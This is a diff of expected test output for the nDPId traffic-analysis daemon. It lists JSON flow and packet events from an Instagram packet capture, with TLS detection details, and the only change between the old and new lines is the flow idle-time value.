-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908581,"flow_last_seen":1436720908581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908581,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1436720908581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908581,"pkt":"ABsv8H60QPMIw47hCABFAAA8pvhAAEAGXgvAqABnLiFGiO3sAbtrdUh\/AAAAAKACOQg15wAAAgQFtAQCCAoAA+6HAAAAAAEDAwY="} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1436720908594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908594,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC94uIUauwKgAZwG7rg7lq\/ivshtmvaASOJCK2QAAAgQFlgQCCAquiQq2AAPuhgEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1436720908594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908594,"pkt":"ABsv8H60QPMIw47hCABFAAA0iDtAAEAGfKrAqABnLiFGrq4OAbuyG2a95av4sIAQAOU2BQAAAQEICgAD7oiuiQq2"} -00985{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1436720908603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908603,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGDAQuIUaIwKgAZwG77ezRfJMua3VIgKASOJCHDAAAAgQFlgQCCArOjo1YAAPuhwEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1436720908603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908603,"pkt":"ABsv8H60QPMIw47hCABFAAA0pvlAAEAGXhLAqABnLiFGiO3sAbtrdUiA0XyTL4AQAOU13wAAAQEICgAD7onOjo1Y"} -00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1436720908615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908615,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN0D2rVm4E5xhKASOJDLywAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1436720908615,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908615,"pkt":"ABsv8H60QPMIw47hCABFAAA0nwZAAEAGbb\/AqABnUlUamqDdAbvgTnGEA9q1Z4AQAOUuJQAAAQEICgAD7opUeSUG"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1436720908616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908616,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN5hmBQZ4jr3HqASOJCH0wAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1436720908616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908616,"pkt":"ABsv8H60QPMIw47hCABFAAA0GZxAAEAG8ynAqABnUlUamqDeAbviOvceYZgUGoAQAOUuJQAAAQEICgAD7opUeSUG"} 
-00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} -01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} 
-01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 
-01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} -01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} 
-01437{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908581,"flow_last_seen":1436720908581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908581,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1436720908581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908581,"pkt":"ABsv8H60QPMIw47hCABFAAA8pvhAAEAGXgvAqABnLiFGiO3sAbtrdUh\/AAAAAKACOQg15wAAAgQFtAQCCAoAA+6HAAAAAAEDAwY="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1436720908594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908594,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC94uIUauwKgAZwG7rg7lq\/ivshtmvaASOJCK2QAAAgQFlgQCCAquiQq2AAPuhgEDAwU="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1436720908594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908594,"pkt":"ABsv8H60QPMIw47hCABFAAA0iDtAAEAGfKrAqABnLiFGrq4OAbuyG2a95av4sIAQAOU2BQAAAQEICgAD7oiuiQq2"} +00985{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1436720908603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908603,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGDAQuIUaIwKgAZwG77ezRfJMua3VIgKASOJCHDAAAAgQFlgQCCArOjo1YAAPuhwEDAwU="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1436720908603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908603,"pkt":"ABsv8H60QPMIw47hCABFAAA0pvlAAEAGXhLAqABnLiFGiO3sAbtrdUiA0XyTL4AQAOU13wAAAQEICgAD7onOjo1Y"} +00984{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1436720908615,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908615,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN0D2rVm4E5xhKASOJDLywAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1436720908615,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908615,"pkt":"ABsv8H60QPMIw47hCABFAAA0nwZAAEAGbb\/AqABnUlUamqDdAbvgTnGEA9q1Z4AQAOUuJQAAAQEICgAD7opUeSUG"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1436720908616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908616,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN5hmBQZ4jr3HqASOJCH0wAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1436720908616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908616,"pkt":"ABsv8H60QPMIw47hCABFAAA0GZxAAEAG8ynAqABnUlUamqDeAbviOvceYZgUGoAQAOUuJQAAAQEICgAD7opUeSUG"} 
